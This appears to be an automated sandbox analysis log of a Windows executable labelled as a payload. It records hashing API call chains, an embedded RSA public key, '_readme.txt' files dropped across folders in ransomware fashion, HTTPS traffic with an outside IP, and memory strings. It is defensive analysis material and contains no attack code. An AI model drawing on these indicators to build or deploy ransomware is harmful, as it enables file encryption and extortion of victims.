              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F0E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,4_2_00F0E870
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F0EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,4_2_00F0EAA0
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F0EA51 CryptDestroyHash,CryptReleaseContext,4_2_00F0EA51
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F0EC68 CryptDestroyHash,CryptReleaseContext,4_2_00F0EC68
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F10FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,4_2_00F10FC0
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnu0nG7aeNA169GxkxNjX\\neNRPybTqmtjleCFNjJGArz4ioIdV0UkKIk2_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnu0nG7aeNA169GxkxNjX\\neNRPybTqmtjleCFNjJGArz4ioIdV0UkKIk2_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnu0nG7aeNA169GxkxNjX\\neNRPybTqmtjleCFNjJGArz4ioIdV0UkKIk2_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnu0nG7aeNA169GxkxNjX\\neNRPybTqmtjleCFNjJGArz4ioIdV0UkKIk2_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnu0nG7aeNA169GxkxNjX\\neNRPybTqmtjleCFNjJGArz4ioIdV0UkKIk2_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnu0nG7aeNA169GxkxNjX\\neNRPybTqmtjleCFNjJGArz4ioIdV0UkKIk2_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnu0nG7aeNA169GxkxNjX\\neNRPybTqmtjleCFNjJGArz4ioIdV0UkKIk2_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnu0nG7aeNA169GxkxNjX\\neNRPybTqmtjleCFNjJGArz4ioIdV0UkKIk2_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnu0nG7aeNA169GxkxNjX\\neNRPybTqmtjleCFNjJGArz4ioIdV0UkKIk2_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnu0nG7aeNA169GxkxNjX\\neNRPybTqmtjleCFNjJGArz4ioIdV0UkKIk2_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnu0nG7aeNA169GxkxNjX\\neNRPybTqmtjleCFNjJGArz4ioIdV0UkKIk2_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnu0nG7aeNA169GxkxNjX\\neNRPybTqmtjleCFNjJGArz4ioIdV0UkKIk2_2_00F29E70
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeBinary or memory string: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnu0nG7aeNA169GxkxNjX\\neNRPybTqmtjleCFNjJGArz4ioIdV0UkKIk
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\_readme.txtJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\$WinREAgent\_readme.txtJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\$WinREAgent\Scratch\_readme.txtJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\_readme.txtJump to behavior
              Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49729 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\i source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218928019.0000000003924000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241431328.000000000393D000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2220505539.000000000392F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218644067.00000000038EA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\001\* source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.1923906292.0000000003366000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\input\fr-029\d.pdb\C source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241580855.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242440912.000000000380F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242013730.00000000037F4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2243247829.0000000003813000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242219779.0000000003807000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219190417.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219510848.00000000037F4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2284691080.000000000338E000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2285082947.0000000003395000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2283843769.0000000003366000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2286049396.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2286088788.00000000033B2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218928019.0000000003924000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2221073589.000000000394A000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2220505539.000000000392F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218644067.00000000038EA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\k source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193832137.000000000339F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.1960744215.0000000003391000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193661261.000000000338E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242821627.0000000003B6A000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2253587616.0000000003B4B000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2253827941.0000000003B5B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\l\\m source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219677966.000000000339D000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219600233.000000000337F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193832137.000000000339F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2220925314.00000000033AB000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193661261.000000000338E000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219724581.00000000033A8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\**KS source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218928019.0000000003924000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2220505539.000000000392F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2221019440.000000000395A000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218644067.00000000038EA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\c source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218928019.0000000003924000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241431328.000000000393D000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2220505539.000000000392F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218644067.00000000038EA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2290353471.0000000003C82000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e\L source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2299664958.0000000003C03000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\k source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2299293473.0000000003C9E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2303833195.0000000003D57000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2299751780.0000000003D57000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\" source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2262926457.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261615896.0000000003B92000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2303180296.0000000003B63000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2303090590.0000000003B33000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\B/ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2252822948.000000000388C000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241038155.000000000386A000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2250283430.000000000386A000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2251653609.0000000003889000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241655390.0000000003891000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2254165587.000000000388F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\we\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261869699.0000000003B53000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\!au source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261307850.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2285187218.00000000037FC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2283628398.00000000037EA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2303570677.000000000394C000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2306593926.000000000393F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2302847985.000000000394C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\3 source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2262926457.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2284252311.0000000003BC3000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261615896.0000000003B92000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\icat{( source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2263808429.000000000394A000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2262263313.00000000038EA000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261008047.00000000038EA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\pplic source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2313169253.0000000003979000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2309346506.0000000003969000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Tk source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.1960744215.0000000003391000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ate\d source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261225726.0000000003986000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2253471637.0000000003991000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261008047.0000000003961000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2250908577.000000000398A000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2250283430.0000000003961000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\s source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2290160289.0000000003C22000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2285406721.0000000003C26000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\y source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219190417.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219510848.00000000037F4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2290160289.0000000003C22000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\tCache\" source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2303833195.0000000003CFF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\Application^ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2307032811.0000000003BF2000.00000004.00000020.00020000.00000000.sdmp
